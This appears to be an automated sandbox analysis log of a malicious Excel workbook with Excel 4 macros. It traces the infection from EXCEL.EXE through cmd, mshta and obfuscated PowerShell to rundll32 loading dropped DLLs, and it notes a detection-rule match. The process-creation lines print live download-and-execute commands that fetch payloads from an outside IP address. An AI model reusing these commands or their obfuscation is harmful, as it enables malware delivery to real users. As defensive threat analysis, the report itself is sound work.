                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AA429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00292830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A1831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B0867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A6864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00299A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B3672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A5040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00298650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002ACC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002944FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A64F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002988F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B04DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002968DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A0D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AFF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A8D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A3D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A0946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B0D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00291950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A2753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AA156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A4B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A99AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AC9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00292FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A41A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00293FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AC38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00297B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A9186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00291F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B1993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AEBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A2BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A7BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A45CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00285CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00279700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00276C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00272830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00281831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00276A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0029146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00286864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00290867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00279A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00293672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00285040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00278650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002804B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00276083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002770ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002788F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002864F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002744FA
                            Source: 36E8.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: DOCUMENT_2801.xlsMacro extractor: Sheet name: Macro3
                            Source: DOCUMENT_2801.xlsMacro extractor: Sheet name: Macro3
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029C67D DeleteService,
                            Source: DOCUMENT_2801.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hzcvqvi\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: DOCUMENT_2801.xlsOLE indicator, VBA macros: true
                            Source: DOCUMENT_2801.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/9@1/35
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: DOCUMENT_2801.xlsOLE indicator, Workbook stream: true
                            Source: DOCUMENT_2801.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,
                            Source: DOCUMENT_2801.xlsReversingLabs: Detection: 16%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.].................H.......................
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............................d1......................8.Hb............`{.J.......J............8...............................
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............................d1......................8.Hb............`{.J.......J....................~.......................
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............................d1......................8.Hb............`{.J.......J............8...............................
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L.......................................................x.Hb...............J.......J............x...............................
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L.......................................................A....... ..J....................x..J............Z..................J....
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............................`!-.....................x.Hb......,........J.......J............x...............................
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........w.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................p.4k....................................}..v............0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................p.4k..... ..............................}..v....H.......0.................w.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k....................................}..v............0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k....x.w.............................}..v............0.................w.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............`.4k....................................}..v....0.......0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............`.4k....(.w.............................}..v............0.................w.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................4k....E...............................}..v............0...............x.w.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.................4k....E...............................}..v............0...............x.w.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.......................:.......................
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD509.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_00343C3B CreateToolhelp32Snapshot,
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: 36E8.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D08CB push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D00C1 push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D08CB push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D00C1 push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D08CB push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D00C1 push 8B490315h; iretd
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260A21 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260655 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF002620D0 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF002623DD push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00261B30 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260002 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260000 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF0026009A push eax; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B15F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008109F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081054C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007315F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006015F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002915F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002715F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0034114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: Milossd.dll.8.drStatic PE information: real checksum: 0x8f55d should be: 0x8973e
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Milossd.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)Jump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Milossd.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
